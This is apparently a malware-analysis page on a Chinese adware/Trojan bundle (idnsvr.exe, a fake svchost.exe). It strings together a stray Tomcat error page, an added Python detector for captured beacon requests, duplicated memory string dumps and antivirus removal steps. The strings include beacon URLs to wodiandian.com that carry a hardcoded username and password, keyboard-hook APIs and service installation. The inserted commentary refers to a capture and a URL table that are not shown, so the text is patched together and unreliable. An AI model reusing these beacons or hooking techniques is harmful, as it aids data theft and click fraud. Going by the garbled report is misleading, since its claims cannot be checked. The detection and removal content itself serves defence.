Connection: close
[Apache Tomcat/7.0.22 HTML error page; inline stylesheet omitted]
HTTP Status 500 -
type: Exception report
message:
description: The server encountered an internal error () that prevented it from fulfilling this request.
exception: java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)
    java.io.FileInputStream.open(Native Method)
    java.io.FileInputStream.<init>(FileInputStream.java:120)
    java.io.FileInputStream.<init>(FileInputStream.java:79)
    java.io.FileReader.<init>(FileReader.java:41)
    net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103)

<<< skipped >>>
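Nothing is recorded under the IDS verdicts heading above, so the following is detection logic for the transactions in this capture, written as an added example in Python (not from the page and not from any IDS ruleset). The traits it keys on are all visible in the traffic: the /stat/ beacons to jump.cnnic.cn carry a four-digit sid= field plus the sw=C_gr294 or FromTo= identifiers and, as captured, no User-Agent header; the update fetches go to update.cnnic.cn under /cdnClient/update/; and the wxpSetup256.txt probes rotate across www2..www5.softuu.cn with an IE7 User-Agent string. The sample requests are trimmed from the capture (the long Accept and User-Agent values are shortened), one benign request is constructed as a negative control, and the indicator names are mine.

```python
"""Classify raw HTTP requests against the indicators seen in this capture."""
import re

# Requests trimmed from the capture above, plus one constructed benign request.
SAMPLES = [
    "POST /stat/first HTTP/1.1\r\nHost: jump.cnnic.cn\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 53\r\n\r\n"
    "sid=1001&pid=0000&sw=C_gr294&sp=002.006.000.000&drv=1",
    "GET /down/wxpSetup256.txt HTTP/1.1\r\nAccept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)\r\n"
    "Host: www5.softuu.cn\r\n\r\n",
    "GET /cdnClient/update/v26_p/update.exe HTTP/1.1\r\nHost: update.cnnic.cn\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n",
    # Constructed negative control.
    "GET /index.html HTTP/1.1\r\nHost: example.org\r\nUser-Agent: curl/8.0\r\n\r\n",
]

STAT_BODY = re.compile(r"(^|&)sid=\d{4}(&|$)")

def parse_request(raw):
    """Split a raw request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}

def classify(req):
    """Return the indicator names a request matches (empty list if none)."""
    host = req["headers"].get("host", "").lower()
    path = req["path"]
    hits = []
    if (req["method"] == "POST" and host == "jump.cnnic.cn"
            and path.startswith("/stat/") and STAT_BODY.search(req["body"])):
        hits.append("cnnic-stat-beacon")
        if "sw=C_gr294" in req["body"] or "FromTo=" in req["body"]:
            hits.append("cnnic-stat-beacon-C_gr294")
    if (req["method"] == "GET" and host == "update.cnnic.cn"
            and path.startswith("/cdnClient/update/")):
        hits.append("cnnic-update-fetch")
    if (req["method"] == "GET" and host.endswith(".softuu.cn")
            and path == "/down/wxpSetup256.txt"):
        hits.append("softuu-wxpSetup256-fetch")
    # The cnnic requests in the capture carry no User-Agent at all.
    if host.endswith("cnnic.cn") and "user-agent" not in req["headers"]:
        hits.append("no-user-agent")
    return hits

def scan(samples):
    return [classify(parse_request(s)) for s in samples]

if __name__ == "__main__":
    for raw, hits in zip(SAMPLES, scan(SAMPLES)):
        print(raw.split("\r\n")[0], "->", hits or "clean")
```

The host-based rules are the brittle part (the URL table above also lists update.jogo.cn and jump.knet.cn for the same paths), so in a production rule the path-plus-body pattern of the /stat/ beacon is the part worth keeping when the hostnames change.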

svchost.exe_1992:

`.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute4
ole32.dll
olepro32.dll
supports
importNode
%s="%s"
%s%s%s: %d%s%s
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortT
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordPeH
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient4
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP4
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions0
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
IWebBrowser
IWebBrowserApp
IWebBrowser2P
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowser
TWebBrowserX
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop4
OnWindowSetWidth
OnWindowSetHeight
DLCTL_URL_ENCODING_DISABLE_UTF8
DLCTL_URL_ENCODING_ENABLE_UTF8
FzWebBrowser
TFzWebBrowser
WebBrowser1
WebBrowser1NavigateError
WebBrowser1NewWindow2
WebBrowser1NewWindow3
http://www.wodiandian.com/client_submit_click_data.do?username=aaajjj&password=
&key=
WebBrowser1NewWindow2"
WebBrowser1StatusTextChange
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
*.txt
http://www.wodiandian.com/client_reload_urls_data.do?username=aaajjj&password=
%s
\Software\Microsoft\Windows\CurrentVersion\Internet Settings
http://
%s%s%s%s%S
ServiceExecute
c:\MP3\svchost.exe
c:\MP3
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wininet.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
.SHDocVw_TLB
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
OnExecute
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2000/xmlns/
http://www.w3.org/2001/XMLSchema-instance
http://www.easy78.cn
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
 Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread Error: %s (%d)
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_1992_rwx_003D0000_00002000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

svchost.exe_1992_rwx_00401000_000B5000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute4
ole32.dll
olepro32.dll
supports
importNode
%s="%s"
%s%s%s: %d%s%s
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortT
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordPeH
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient4
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP4
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions0
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
IWebBrowser
IWebBrowserApp
IWebBrowser2P
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowser
TWebBrowserX
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop4
OnWindowSetWidth
OnWindowSetHeight
DLCTL_URL_ENCODING_DISABLE_UTF8
DLCTL_URL_ENCODING_ENABLE_UTF8
FzWebBrowser
TFzWebBrowser
WebBrowser1
WebBrowser1NavigateError
WebBrowser1NewWindow2
WebBrowser1NewWindow3
http://www.wodiandian.com/client_submit_click_data.do?username=aaajjj&password=
&key=
WebBrowser1NewWindow2"
WebBrowser1StatusTextChange
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
*.txt
http://www.wodiandian.com/client_reload_urls_data.do?username=aaajjj&password=
%s
\Software\Microsoft\Windows\CurrentVersion\Internet Settings
http://
%s%s%s%s%S
ServiceExecute
c:\MP3\svchost.exe
c:\MP3
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wininet.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
.SHDocVw_TLB
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
OnExecute
http://www.w3.org/2001/XMLSchema
http://www.w3.org/2000/xmlns/
http://www.w3.org/2001/XMLSchema-instance
http://www.easy78.cn
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
 Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread Error: %s (%d)
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

idnsvr.exe_4052:

.text
`.rdata
@.data
.rsrc
user32.dll
WinExec
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegNotifyChangeKeyValue
ADVAPI32.dll
ole32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
GetCPInfo
advapi32.dll
cnprovh.dll
FinalMsg
repreg.dat
replace.dat
ctrcfg.ini
usrcfg.ini
idnsvr.dll
\\.\CnTran
159.226.1.19
xn--cnnic-vo0ll97o.xn--fiqs8s
ipconfig.exe /flushdns
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
%Program Files%\OCINS\
dnsvr.exe
%Program Files%\OCINS\idnsvr.exe
.Xtnz
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
2, 6, 0, 0
idnsvr.exe
1.2.6.7
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
Replace%Select the entire document


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    soft256.exe:2724
    cnnic_1009.exe:2892
    m4.exe:2840
    update.exe:3408
    setup.exe:2200
    setup.exe:3476
    setup.exe:3264
    %original file name%.exe:1712
    idnsvr.exe:4052

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %System%\e1JePg78g.dll (33 bytes)
    %System%\setup.exe (12214 bytes)
    C:\MP3\svchost.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)
    %Program Files%\OCINS\convf.dll (1281 bytes)
    %Program Files%\OCINS\replace.dat (343 bytes)
    %Program Files%\OCINS\kwacs.dat (16 bytes)
    %System%\drivers\cnprov.sys (673 bytes)
    %Program Files%\OCINS\cuscfg.dat (145 bytes)
    %Program Files%\OCINS\ctrcfg.ini (230 bytes)
    %Program Files%\OCINS\cnrbtn.html (486 bytes)
    %System%\drivers\idnaux.sys (10 bytes)
    %Program Files%\OCINS\version.dat (482 bytes)
    %Program Files%\OCINS\kwrep.dat (191 bytes)
    %Program Files%\OCINS\idnaux.dat (39 bytes)
    %Program Files%\OCINS\uninstall.exe (673 bytes)
    %Program Files%\OCINS\srchsp.dll (32 bytes)
    %Program Files%\OCINS\ieaux.dll (673 bytes)
    %System%\cnprov.dat (1 bytes)
    %Program Files%\OCINS\cnstc.ini (1 bytes)
    %WinDir%\ocinfo.dat (8 bytes)
    %System%\idnreg.dll (36 bytes)
    %Program Files%\OCINS\addrmsg.dll (601 bytes)
    %Program Files%\OCINS\addrmsg.ini (6 bytes)
    %Program Files%\OCINS\cnprovh.dll (601 bytes)
    %Program Files%\OCINS\convs.dll (601 bytes)
    %Program Files%\OCINS\cndsv.dll (601 bytes)
    %Program Files%\OCINS\config.exe (601 bytes)
    %Program Files%\OCINS\idnsvr.exe (601 bytes)
    %Program Files%\OCINS\idnsvr.dll (601 bytes)
    %Program Files%\OCINS\usrcfg.ini (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Program Files%\OCINS\update\version.dat (482 bytes)
    %Program Files%\OCINS\austr.dll (65 bytes)
    %Program Files%\OCINS\update\data2.cab (9696 bytes)
    %Program Files%\OCINS\update\update.exe (273697 bytes)
    %Program Files%\OCINS\update\austr.dll (1568 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
